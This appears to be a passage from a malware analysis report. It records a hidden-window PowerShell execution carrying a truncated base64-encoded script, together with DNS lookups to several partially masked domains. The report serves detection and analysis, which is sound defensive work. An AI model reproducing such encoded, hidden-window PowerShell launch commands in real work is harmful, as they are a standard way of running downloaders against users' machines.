Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAWABkAGMAZwByAGkAbgBuAGcAegB0ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFEAYgB0AGQAbABiAHIAcAAgACMAPgAgACQASABlAHYAaQBpAHMAZABpAHIAZABwAG4APQAnAEUAbwBu...
- DNS ASK wp.##sergy.com
- DNS ASK sh##.mixme.com
- DNS ASK ne#.##bazaar.com
- DNS ASK yo####tculture.com
- DNS ASK qu####lutions.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAWABkAGMAZwByAGkAbgBuAGcAegB0ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFEAYgB0AGQAbABiAHIAcAAgACMAPgAgACQASABlAHYAaQBpAHMAZABpAHIAZABwAG4APQAnAEUAbwBu...' (with hidden window)